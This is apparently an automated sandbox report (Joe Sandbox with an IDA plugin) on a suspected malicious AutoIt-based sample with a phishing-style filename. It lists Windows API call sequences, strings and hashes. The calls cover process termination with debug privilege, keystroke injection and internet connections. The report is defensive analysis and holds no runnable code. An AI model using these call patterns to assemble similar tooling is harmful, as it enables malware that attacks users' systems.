                                                      • API String ID: 1268354404-0
                                                      APIs
                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 002FC182
                                                      • GetLastError.KERNEL32 ref: 002FC195
                                                      • SetEvent.KERNEL32(?), ref: 002FC1A9
                                                        • Part of subcall function 002FC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 002FC272
                                                        • Part of subcall function 002FC253: GetLastError.KERNEL32 ref: 002FC322
                                                        • Part of subcall function 002FC253: SetEvent.KERNEL32(?), ref: 002FC336
                                                        • Part of subcall function 002FC253: InternetCloseHandle.WININET(00000000), ref: 002FC341
                                                      Similarity
                                                      • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                      • API String ID: 337547030-0
                                                      APIs
                                                        • Part of subcall function 002E3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 002E3A57
                                                        • Part of subcall function 002E3A3D: GetCurrentThreadId.KERNEL32 ref: 002E3A5E
                                                        • Part of subcall function 002E3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,002E25B3), ref: 002E3A65
                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 002E25BD
                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 002E25DB
                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 002E25DF
                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 002E25E9
                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 002E2601
                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 002E2605
                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 002E260F
                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 002E2623
                                                      • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 002E2627
                                                      Similarity
                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                      • API String ID: 2014098862-0
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,002E1449,?,?,00000000), ref: 002E180C
                                                      • HeapAlloc.KERNEL32(00000000,?,002E1449,?,?,00000000), ref: 002E1813
                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,002E1449,?,?,00000000), ref: 002E1828
                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,002E1449,?,?,00000000), ref: 002E1830
                                                      • DuplicateHandle.KERNEL32(00000000,?,002E1449,?,?,00000000), ref: 002E1833
                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,002E1449,?,?,00000000), ref: 002E1843
                                                      • GetCurrentProcess.KERNEL32(002E1449,00000000,?,002E1449,?,?,00000000), ref: 002E184B
                                                      • DuplicateHandle.KERNEL32(00000000,?,002E1449,?,?,00000000), ref: 002E184E
                                                      • CreateThread.KERNEL32(00000000,00000000,002E1874,00000000,00000000,00000000), ref: 002E1868
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                      • String ID:
                                                      • API String ID: 1957940570-0
                                                      • Opcode ID: 8f5bb393fd18f28bbee2ef4081db90ce494778c836c6dce6dc5fe27cb119fe1e
                                                      • Instruction ID: 81c377ed1b6edbf78efb10fdf7684df106771f64bb26bfd7032a4c89e3ee6dbf
                                                      • Opcode Fuzzy Hash: 8f5bb393fd18f28bbee2ef4081db90ce494778c836c6dce6dc5fe27cb119fe1e
                                                      • Instruction Fuzzy Hash: A201BFB52D0344BFE711AB65DC4DF977B6CEB89B11F409421FA05DB191C6749810CB20
                                                      APIs
                                                        • Part of subcall function 002ED4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 002ED501
                                                        • Part of subcall function 002ED4DC: Process32FirstW.KERNEL32(00000000,?), ref: 002ED50F
                                                        • Part of subcall function 002ED4DC: CloseHandle.KERNEL32(00000000), ref: 002ED5DC
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0030A16D
                                                      • GetLastError.KERNEL32 ref: 0030A180
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0030A1B3
                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 0030A268
                                                      • GetLastError.KERNEL32(00000000), ref: 0030A273
                                                      • CloseHandle.KERNEL32(00000000), ref: 0030A2C4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                      • String ID: SeDebugPrivilege
                                                      • API String ID: 2533919879-2896544425
                                                      • Opcode ID: 8de31f0b2476a83832413555ea70383376e9f6d9c2a487f77df4eaade3ce84d7
                                                      • Instruction ID: cdda43d7d042ff2acbdc46c8bf0df8795abcc3a7a984ab84a00197808f7640ef
                                                      • Opcode Fuzzy Hash: 8de31f0b2476a83832413555ea70383376e9f6d9c2a487f77df4eaade3ce84d7
                                                      • Instruction Fuzzy Hash: F861BB34216742AFD321DF18D4A4F15BBA9AF54308F19849CE4668BBE3C772EC45CB92
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00313925
                                                      • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0031393A
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00313954
                                                      • _wcslen.LIBCMT ref: 00313999
                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 003139C6
                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 003139F4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window_wcslen
                                                      • String ID: SysListView32
                                                      • API String ID: 2147712094-78025650
                                                      • Opcode ID: c332f7890855c0c4754fcef5ca382a644423b4d4d31d13c47ec51ae339c01e96
                                                      • Instruction ID: b194ec35c22d50f1d5535034b6dab2f15e91631af431cb5e178571affdd061f4
                                                      • Opcode Fuzzy Hash: c332f7890855c0c4754fcef5ca382a644423b4d4d31d13c47ec51ae339c01e96
                                                      • Instruction Fuzzy Hash: 3D41C231A00218ABEF269F64CC49FEA7BA9EF0C350F150526F958E7281D7719E94CB90
                                                      APIs
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002EBCFD
                                                      • IsMenu.USER32(00000000), ref: 002EBD1D
                                                      • CreatePopupMenu.USER32 ref: 002EBD53
                                                      • GetMenuItemCount.USER32(00D35900), ref: 002EBDA4
                                                      • InsertMenuItemW.USER32(00D35900,?,00000001,00000030), ref: 002EBDCC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                      • String ID: 0$2
                                                      • API String ID: 93392585-3793063076
                                                      • Opcode ID: 70cbbbe0c76ea318bce2a012d6c1f851396d32539d131d77376c8d73f0ea62b0
                                                      • Instruction ID: 5cbf4c86becb38e4d49baba759e3de7a00cbe9c265d193b49458bb5002bff4ab
                                                      • Opcode Fuzzy Hash: 70cbbbe0c76ea318bce2a012d6c1f851396d32539d131d77376c8d73f0ea62b0
                                                      • Instruction Fuzzy Hash: 5751D170A6028A9BDF12CFAACC88BEFBBF8BF45314F648159E411D7290D7709960CB51
                                                      APIs
                                                      • _ValidateLocalCookies.LIBCMT ref: 002A2D4B
                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 002A2D53
                                                      • _ValidateLocalCookies.LIBCMT ref: 002A2DE1
                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 002A2E0C
                                                      • _ValidateLocalCookies.LIBCMT ref: 002A2E61
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                      • String ID: &H*$csm
                                                      • API String ID: 1170836740-447412993
                                                      • Opcode ID: 9c2d763e16d93d1ab3502ab56090f4d4b6342ebbec6c6ab72282674ce6854219
                                                      • Instruction ID: 9362c3dce3f17dd6c62df48e5490a29c0f11b0ddfa2305fd21af8c834b359719
                                                      • Opcode Fuzzy Hash: 9c2d763e16d93d1ab3502ab56090f4d4b6342ebbec6c6ab72282674ce6854219
                                                      • Instruction Fuzzy Hash: 5841A234A20209EBCF10DF6CC845A9EBBB5BF46324F148155E814AB352DF35EA29CF90
                                                      APIs
                                                      • LoadIconW.USER32(00000000,00007F03), ref: 002EC913
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: IconLoad
                                                      • String ID: blank$info$question$stop$warning
                                                      • API String ID: 2457776203-404129466
                                                      • Opcode ID: 0aa9f8e5dd965e95870bedd041cf87a3584705f4013e4f865c41654a52cb51fe
                                                      • Instruction ID: 818a3fa158f573fbaf50e172395684b11ef298478e2f64c68d1c2245d83e7af7
                                                      • Opcode Fuzzy Hash: 0aa9f8e5dd965e95870bedd041cf87a3584705f4013e4f865c41654a52cb51fe
                                                      • Instruction Fuzzy Hash: B011EE316F9347BAA702AF959C83CFE67DCDF16354BB0002AF900A6283DBF4AD115665
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$LocalTime
                                                      • String ID:
                                                      • API String ID: 952045576-0
                                                      • Opcode ID: 2f3595bed02a0ba0e02a59d9d6775f58029a52b4ab169a29bca7312bd18b729a
                                                      • Instruction ID: 74ebe801d2ee4c840add982e1dd2fccb2ae3151044fc668a8dbdffde8f859d22
                                                      • Opcode Fuzzy Hash: 2f3595bed02a0ba0e02a59d9d6775f58029a52b4ab169a29bca7312bd18b729a
                                                      • Instruction Fuzzy Hash: 15418565C20258A6CB11FBF58C8AACFB7ACAF46710F544462E914E3122EF34D265CBA5
                                                      APIs
                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,002D682C,00000004,00000000,00000000), ref: 0029F953
                                                      • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,002D682C,00000004,00000000,00000000), ref: 002DF3D1
                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,002D682C,00000004,00000000,00000000), ref: 002DF454
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ShowWindow
                                                      • String ID:
                                                      • API String ID: 1268545403-0
                                                      • Opcode ID: ffd7ec91b588cc9696c96961596f06e94238b66c8c0e96b04569e2972257d3c3
                                                      • Instruction ID: 5d7130851aa6c9268db315650d03c435c9f8b1463ac8e7a5bcb200141cc993be
                                                      • Opcode Fuzzy Hash: ffd7ec91b588cc9696c96961596f06e94238b66c8c0e96b04569e2972257d3c3
                                                      • Instruction Fuzzy Hash: 73413D312346C1BEEFF99F29CB8876A7B95AB4A314F14843DE087D6660C67198A0CB10
                                                      APIs
                                                      • DeleteObject.GDI32(00000000), ref: 00312D1B
                                                      • GetDC.USER32(00000000), ref: 00312D23
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00312D2E
                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00312D3A
                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00312D76
                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00312D87
                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00315A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00312DC2
                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00312DE1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                      • String ID:
                                                      • API String ID: 3864802216-0
                                                      • Opcode ID: 8b668abb107c5cb9adba01c39dcd183dc79c5d6561fae1fc152663cf031c282b
                                                      • Instruction ID: dd5363400bac91bc27c761eeec9ec7f052066cef79f037e7977273b969e2f774
                                                      • Opcode Fuzzy Hash: 8b668abb107c5cb9adba01c39dcd183dc79c5d6561fae1fc152663cf031c282b
                                                      • Instruction Fuzzy Hash: A9319C72251214BFEB168F50DC8AFEB3BADEF0D711F089055FE089A291C6759C60CBA4
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: _memcmp
                                                      • String ID:
                                                      • API String ID: 2931989736-0
                                                      • Opcode ID: a970d0589878d7360b499482df74b3e4f85ac3cfe8833fc6294bac3682e1cd98
                                                      • Instruction ID: 69f65a24740b8a762b5ced6869ed29e8daec246132d4c5cc87d0241c7a1e14ba
                                                      • Opcode Fuzzy Hash: a970d0589878d7360b499482df74b3e4f85ac3cfe8833fc6294bac3682e1cd98
                                                      • Instruction Fuzzy Hash: 6421AA616F09667BD6199E124D92FFB735CAF1539CF840020FD045A585FB60ED3085E5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                      • API String ID: 0-572801152
                                                      • Opcode ID: d441f0b1dc7d9955058e4903c219d16dcb5f85ab2623a2d2b13cd214e0dd91ac
                                                      • Instruction ID: 4bea42e5bb57017bbdf16d6301328198d5b497f8e07f4c71548a99f7b95d16cf
                                                      • Opcode Fuzzy Hash: d441f0b1dc7d9955058e4903c219d16dcb5f85ab2623a2d2b13cd214e0dd91ac
                                                      • Instruction Fuzzy Hash: 13D1F175A0160AAFDF15CFA8C890BAFB7B9BF48344F158069E915AB280E770DD41CF90
                                                      APIs
                                                      • GetCPInfo.KERNEL32(?,?), ref: 002C15CE
                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 002C1651
                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 002C16E4
                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 002C16FB
                                                        • Part of subcall function 002B3820: RtlAllocateHeap.NTDLL(00000000,?,00351444,?,0029FDF5,?,?,0028A976,00000010,00351440,002813FC,?,002813C6,?,00281129), ref: 002B3852
                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 002C1777
                                                      • __freea.LIBCMT ref: 002C17A2
                                                      • __freea.LIBCMT ref: 002C17AE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                      • String ID:
                                                      • API String ID: 2829977744-0
                                                      Similarity
                                                      • API ID: Variant$ClearInit
                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                      • API String ID: 2610073882-625585964
                                                      APIs
                                                      • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 002F125C
                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 002F1284
                                                      • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 002F12A8
                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 002F12D8
                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 002F135F
                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 002F13C4
                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 002F1430
                                                      Similarity
                                                      • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                      • String ID:
                                                      • API String ID: 2550207440-0
                                                      Similarity
                                                      • API ID: ObjectSelect$BeginCreatePath
                                                      • String ID:
                                                      • API String ID: 3225163088-0
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 0030396B
                                                      • CharUpperBuffW.USER32(?,?), ref: 00303A7A
                                                      • _wcslen.LIBCMT ref: 00303A8A
                                                      • VariantClear.OLEAUT32(?), ref: 00303C1F
                                                        • Part of subcall function 002F0CDF: VariantInit.OLEAUT32(00000000), ref: 002F0D1F
                                                        • Part of subcall function 002F0CDF: VariantCopy.OLEAUT32(?,?), ref: 002F0D28
                                                        • Part of subcall function 002F0CDF: VariantClear.OLEAUT32(?), ref: 002F0D34
                                                      Similarity
                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                      • API String ID: 4137639002-1221869570
                                                      APIs
                                                        • Part of subcall function 002E000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,002DFF41,80070057,?,?,?,002E035E), ref: 002E002B
                                                        • Part of subcall function 002E000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,002DFF41,80070057,?,?), ref: 002E0046
                                                        • Part of subcall function 002E000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,002DFF41,80070057,?,?), ref: 002E0054
                                                        • Part of subcall function 002E000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,002DFF41,80070057,?), ref: 002E0064
                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00304C51
                                                      • _wcslen.LIBCMT ref: 00304D59
                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00304DCF
                                                      • CoTaskMemFree.OLE32(?), ref: 00304DDA
                                                      Similarity
                                                      • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                      • String ID: NULL Pointer assignment
                                                      • API String ID: 614568839-2785691316
                                                      APIs
                                                      • GetMenu.USER32(?), ref: 00312183
                                                      • GetMenuItemCount.USER32(00000000), ref: 003121B5
                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 003121DD
                                                      • _wcslen.LIBCMT ref: 00312213
                                                      • GetMenuItemID.USER32(?,?), ref: 0031224D
                                                      • GetSubMenu.USER32(?,?), ref: 0031225B
                                                        • Part of subcall function 002E3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 002E3A57
                                                        • Part of subcall function 002E3A3D: GetCurrentThreadId.KERNEL32 ref: 002E3A5E
                                                        • Part of subcall function 002E3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,002E25B3), ref: 002E3A65
                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 003122E3
                                                        • Part of subcall function 002EE97B: Sleep.KERNEL32 ref: 002EE9F3
                                                      Similarity
                                                      • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                      • String ID:
                                                      • API String ID: 4196846111-0
                                                      APIs
                                                      • GetParent.USER32(?), ref: 002EAEF9
                                                      • GetKeyboardState.USER32(?), ref: 002EAF0E
                                                      • SetKeyboardState.USER32(?), ref: 002EAF6F
                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 002EAF9D
                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 002EAFBC
                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 002EAFFD
                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 002EB020
                                                      Similarity
                                                      • API ID: MessagePost$KeyboardState$Parent
                                                      • String ID:
                                                      • API String ID: 87235514-0
                                                      APIs
                                                      • GetParent.USER32(00000000), ref: 002EAD19
                                                      • GetKeyboardState.USER32(?), ref: 002EAD2E
                                                      • SetKeyboardState.USER32(?), ref: 002EAD8F
                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 002EADBB
                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 002EADD8
                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 002EAE17
                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 002EAE38
                                                      Similarity
                                                      • API ID: MessagePost$KeyboardState$Parent
                                                      • String ID:
                                                      • API String ID: 87235514-0
                                                      APIs
                                                      • GetConsoleCP.KERNEL32(002C3CD6,?,?,?,?,?,?,?,?,002B5BA3,?,?,002C3CD6,?,?), ref: 002B5470
                                                      • __fassign.LIBCMT ref: 002B54EB
                                                      • __fassign.LIBCMT ref: 002B5506
                                                      • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,002C3CD6,00000005,00000000,00000000), ref: 002B552C
                                                      • WriteFile.KERNEL32(?,002C3CD6,00000000,002B5BA3,00000000,?,?,?,?,?,?,?,?,?,002B5BA3,?), ref: 002B554B
                                                      • WriteFile.KERNEL32(?,?,00000001,002B5BA3,00000000,?,?,?,?,?,?,?,?,?,002B5BA3,?), ref: 002B5584
                                                      Similarity
                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                      • String ID:
